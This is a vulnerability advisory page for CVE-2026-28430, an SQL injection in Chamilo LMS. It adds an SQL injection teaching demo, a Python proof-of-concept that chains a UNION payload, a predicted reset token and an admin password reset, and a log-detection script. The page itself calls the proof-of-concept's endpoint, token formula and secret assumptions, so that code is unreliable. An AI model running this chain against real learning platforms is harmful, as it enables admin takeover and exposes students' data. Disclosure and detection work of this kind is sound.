Security Vulnerability Report
CVE-2026-28430 CVSS 9.8 CRITICAL

CVE-2026-28430

Published: 2026-03-16 20:16:18
Last Modified: 2026-03-17 18:53:49

Description

Chamilo LMS is a learning management system. Prior to version 1.11.34, there is an unauthenticated SQL injection vulnerability which allows remote attackers to execute arbitrary SQL commands via the custom_dates parameter. By chaining this with a predictable legacy password reset mechanism, an attacker can achieve full administrative account takeover without any prior credentials. The vulnerability also exposes the entire database, including PII and system configurations. This issue has been patched in version 1.11.34.
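The advisory names only the parameter (custom_dates) and the weakness class (CWE-89); it does not publish the query. To show concretely what "arbitrary SQL commands via the custom_dates parameter" means, here is an added Python/sqlite3 illustration, written for this page and not taken from Chamilo. The two-table schema, the rows, the announcement query and the status=1 filter are all constructed stand-ins, not Chamilo's real schema. The vulnerable function splices the request value into the SQL text; the two functions after it show the fix a maintainer would ship: a bound parameter, plus an ISO-date allow-list since the parameter is a date.

```python
"""A custom_dates-style filter: string-built SQL beside a parameterised one."""
import sqlite3
from datetime import date

# Constructed schema and rows for the demo; NOT Chamilo's real schema or data.
SCHEMA = """
CREATE TABLE user (user_id INTEGER, username TEXT, password TEXT, status INTEGER);
CREATE TABLE c_announcement (id INTEGER, title TEXT, display_date TEXT);
INSERT INTO user VALUES (1, 'admin',   '$2y$10$constructed-admin-hash', 1);
INSERT INTO user VALUES (2, 'student', '$2y$10$constructed-student-hash', 5);
INSERT INTO c_announcement VALUES (10, 'Exam schedule', '2026-03-10');
INSERT INTO c_announcement VALUES (11, 'Campus closed', '2026-03-17');
"""

# Same shape of payload as the PoC further down: close the string literal,
# UNION in rows from another table, comment out the rest of the statement.
# The column count (2) must match the original SELECT for the UNION to parse.
PAYLOAD = "x' UNION SELECT user_id, username || ':' || password FROM user WHERE status = 1-- "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def announcements_vulnerable(conn, custom_dates):
    """CWE-89: the request value is pasted into the SQL text, so quote
    characters and keywords inside it are parsed as SQL, not as data."""
    sql = "SELECT id, title FROM c_announcement WHERE display_date = '%s'" % custom_dates
    return conn.execute(sql).fetchall()


def announcements_safe(conn, custom_dates):
    """Bound parameter: the value reaches the engine as data and cannot
    change the statement's structure, whatever characters it contains."""
    sql = "SELECT id, title FROM c_announcement WHERE display_date = ?"
    return conn.execute(sql, (custom_dates,)).fetchall()


def announcements_validated(conn, custom_dates):
    """Defence in depth: a date parameter should only ever look like a date.
    Reject anything else before it gets anywhere near the database."""
    try:
        date.fromisoformat(custom_dates)
    except (TypeError, ValueError):
        raise ValueError("custom_dates must be an ISO date (YYYY-MM-DD)") from None
    return announcements_safe(conn, custom_dates)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:   ", announcements_vulnerable(db, PAYLOAD))  # leaks the admin hash
    print("parameterised:", announcements_safe(db, PAYLOAD))        # no rows
    print("legit date:   ", announcements_validated(db, "2026-03-10"))
```

Running it, the string-built query returns the admin row's username and password hash even though the announcement table holds nothing for that "date", while the bound-parameter version returns no rows for the same input and the validated version refuses it outright. The allow-list matters on its own: a bound parameter stops injection, but a date parameter that accepts arbitrary text is still a sign the input model is wrong.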

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:* - VULNERABLE
Chamilo LMS < 1.11.34

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.

Read it with the advisory in mind: the advisory names only the custom_dates parameter and a "predictable legacy password reset mechanism". The endpoint path, the extra c_id/a_id parameters, the UNION column count, the reset URL and form fields, the token formula and the hardcoded secret in this script are the PoC author's placeholders, not details the advisory confirms. Step 1 also never parses the injection response; it returns a fixed placeholder hash that steps 2 and 3 do not use, and an HTTP 200 alone does not demonstrate injection.

```python
import hashlib
import sys
import time

import requests

# CVE-2026-28430 PoC - Chamilo LMS Unauthenticated SQL Injection + Admin Takeover
# Author: Security Researcher
#
# The endpoint path, c_id/a_id parameters, UNION column count, reset endpoint,
# form fields, token formula and secret below are assumptions of this script;
# the advisory does not state them. Confirm each against the patched code.

TARGET_URL = "http://target-chamilo-lms.com"
TARGET_PATH = "/main/inc/lib/announcement.inc.php"  # Example vulnerable endpoint (assumed)


def sql_injection_extract_admin():
    """Step 1: Extract admin credentials via SQL injection using the custom_dates parameter."""
    print("[*] Starting SQL injection attack...")
    # Malicious payload to extract admin username and password hash.
    # The injection exploits the custom_dates parameter without sanitization.
    # The column count (5) and the user.status=1 filter are assumptions.
    payload = (
        "1' UNION SELECT CONCAT(user.username,':',user.password),2,3,4,5 "
        "FROM user WHERE user.status=1 LIMIT 1-- "
    )
    params = {
        "custom_dates": payload,
        "c_id": "1",
        "a_id": "1",
    }
    try:
        response = requests.get(f"{TARGET_URL}{TARGET_PATH}", params=params, timeout=30)
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return None
    if response.status_code != 200:
        print("[-] SQL Injection failed")
        return None
    # Parse the response to extract credentials.
    # In a real attack, parse the response HTML/JSON for admin:password_hash.
    print("[+] SQL Injection successful - Extracting admin credentials...")
    # Example extracted data format: admin:$2y$10$...
    admin_hash = "$2y$10$example_hash_here"  # placeholder; not parsed from the response
    return admin_hash


def predict_reset_token(user_id, timestamp):
    """Step 2: Exploit the legacy password reset mechanism with predictable tokens.

    This script assumes the legacy token is MD5(user_id + secret_key + timestamp);
    the advisory does not state the construction.
    """
    secret_key = "chamilo_legacy_key_2015"  # Hardcoded legacy secret (assumed value)
    token_string = f"{user_id}{secret_key}{timestamp}"
    token = hashlib.md5(token_string.encode()).hexdigest()
    return token, timestamp


def reset_admin_password(token, timestamp):
    """Step 3: Use the predicted token to reset the admin password."""
    reset_url = f"{TARGET_URL}/main/auth/reset_password.php"  # assumed reset endpoint
    data = {
        "reset_token": token,
        "timestamp": timestamp,
        "new_password": "P@ssw0rd123!",
        "new_password_confirm": "P@ssw0rd123!",
    }
    try:
        response = requests.post(reset_url, data=data, timeout=30)
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False
    if response.status_code == 200 and "success" in response.text.lower():
        print("[+] Password reset successful!")
        return True
    return False


def main():
    print("=" * 60)
    print("CVE-2026-28430 PoC - Chamilo LMS Admin Takeover")
    print("=" * 60)

    # Step 1: SQL Injection
    admin_hash = sql_injection_extract_admin()
    if not admin_hash:
        print("[-] Failed to extract admin credentials")
        sys.exit(1)

    # Step 2: Predict reset token (admin user_id is typically 1)
    admin_user_id = 1
    current_time = int(time.time())
    token, timestamp = predict_reset_token(admin_user_id, current_time)
    print(f"[*] Generated reset token: {token}")

    # Step 3: Reset admin password
    if reset_admin_password(token, timestamp):
        print("[+] SUCCESS: Admin account compromised!")
        print("[*] Login with: admin / P@ssw0rd123!")
    else:
        print("[-] Password reset failed - try different timestamp")


if __name__ == "__main__":
    main()
```
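For the defender, the useful artefact of the PoC above is the request shape: a GET whose custom_dates value carries SQL syntax. The following Python is an added detection example, written for this page and not part of the advisory or of Chamilo; it scans constructed combined-format access-log lines (addresses, paths and user agents are made up, and the path is a placeholder, not the vulnerable endpoint) for the custom_dates parameter carrying UNION-based, time-based-blind or quote-and-comment payloads, undoing double URL-encoding first since that is a common evasion.

```python
"""Flag exploitation attempts against the custom_dates parameter in web access logs."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed combined-format log lines. Paths, addresses and agents are made up;
# /main/some_page.php is a placeholder, not the real vulnerable endpoint.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Mar/2026:21:05:12 +0000] "GET /main/some_page.php?custom_dates=1%27+UNION+SELECT+username%2Cpassword+FROM+user--+ HTTP/1.1" 200 5123 "-" "python-requests/2.31"',
    '198.51.100.4 - - [16/Mar/2026:21:05:40 +0000] "GET /main/some_page.php?custom_dates=2026-03-16 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/Mar/2026:21:06:02 +0000] "GET /main/some_page.php?custom_dates=1%2527%2520AND%2520SLEEP(5)--%2520 HTTP/1.1" 200 4870 "-" "python-requests/2.31"',
    '192.0.2.9 - - [16/Mar/2026:21:07:15 +0000] "GET /main/other_page.php?q=test HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Injection families this bug class invites: UNION-based extraction (the PoC),
# time-based blind (SLEEP/BENCHMARK), error-based helpers, and the
# quote-plus-comment framing that almost every payload needs.
SQLI_RE = re.compile(
    r"\bunion\b[\s\S]*\bselect\b"
    r"|\b(?:sleep|benchmark|extractvalue|updatexml)\s*\("
    r"|'\s*(?:or|and)\b"
    r"|--|/\*",
    re.IGNORECASE,
)


def deep_decode(value, max_rounds=3):
    """Undo repeated URL encoding (an evasion trick) with a bound on rounds."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Return a finding dict for one log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    params = parse_qs(target.query, keep_blank_values=True)  # decodes one layer
    for raw in params.get("custom_dates", []):
        value = deep_decode(raw)
        hit = SQLI_RE.search(value)
        if hit:
            return {
                "ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "path": target.path,
                "custom_dates": value,
                "matched": hit.group(0),
                "status": int(m.group("status")),
            }
    return None


def scan_log(lines):
    return [f for f in map(scan_line, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Two lines are flagged (the UNION extraction and the double-encoded SLEEP probe); the legitimate date and the unrelated request are not. Caveats: an access log only shows GET query strings, so a POST body carrying the same payload needs application or WAF logs; keyword matching will produce false positives on values that legitimately contain `--` or `/*`, so treat a hit as a lead to correlate with the installed version (anything below 1.11.34) rather than as a confirmed compromise.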

References

https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-84gw-qjw9-v8jv (Vendor Advisory)
https://github.com/chamilo/chamilo-lms/releases/tag/v1.11.34 (Product, Release Notes)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-28430",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-16T20:16:17.957",
    "lastModified": "2026-03-17T18:53:49.153",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Chamilo LMS is a learning management system. Prior to version 1.11.34, there is an unauthenticated SQL injection vulnerability which allows remote attackers to execute arbitrary SQL commands via the custom_dates parameter. By chaining this with a predictable legacy password reset mechanism, an attacker can achieve full administrative account takeover without any prior credentials. The vulnerability also exposes the entire database, including PII and system configurations. This issue has been patched in version 1.11.34."
      },
      {
        "lang": "es",
        "value": "Chamilo LMS es un sistema de gestión del aprendizaje. Antes de la versión 1.11.34, existe una vulnerabilidad de inyección SQL no autenticada que permite a atacantes remotos ejecutar comandos SQL arbitrarios a través del parámetro custom_dates. Al encadenar esto con un mecanismo predecible de restablecimiento de contraseña heredado, un atacante puede lograr una toma de control completa de la cuenta administrativa sin credenciales previas. La vulnerabilidad también expone toda la base de datos, incluyendo PII y configuraciones del sistema. Este problema ha sido parcheado en la versión 1.11.34."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 9.3,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-89"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.11.34",
                "matchCriteriaId": "BF6714C4-3D58-43BF-A32C-6D436DB93E01"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/chamilo/chamilo-lms/releases/tag/v1.11.34",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-84gw-qjw9-v8jv",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```